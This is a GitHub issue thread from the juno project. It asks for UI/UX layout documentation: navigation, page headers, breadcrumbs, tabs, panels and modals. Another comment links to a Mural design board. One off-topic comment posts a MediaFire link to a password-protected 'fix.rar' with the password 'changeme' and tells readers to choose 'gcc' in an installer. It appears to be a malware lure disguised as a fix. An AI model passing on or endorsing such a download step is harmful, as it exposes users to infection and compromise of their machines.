### ISSUE TITLE
[Task](design): UI/UX documentation - Layout

### ISSUE THREAD

**Issue by edda** [cloudoperators/juno#276]
**Task Description**
Describe and visualise main page structure with the right nomenclature. 

Visuals will be firstly presented on the wireframe level and will include 
information on: 

* Components & their placement 
* Paddings and spacing 
* Elevation of the components

Content to be included in the description
- [ ] Primary navigation hierarchy and placement (Left icon navigation & Global Navigation)
- [ ] Page headers/Page titles
- [ ] Secondary navigational items such as 
    - [ ] Breadcrumbs
    - [ ] Main content left navigation
    - [ ] tabs
- [ ] Panel placement
- [ ] Modal placement

**Related Issues**
Link to related issues or tasks, if any.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by martawright** [comment]
Work in progress can be access: https://app.mural.co/t/sapitservices2737/m/sapitservices2737/1724396854646/a5d3b43e8de125192bf5ad33672741e761dc8cb5?sender=udc259ee5ea77476e3bfe8379
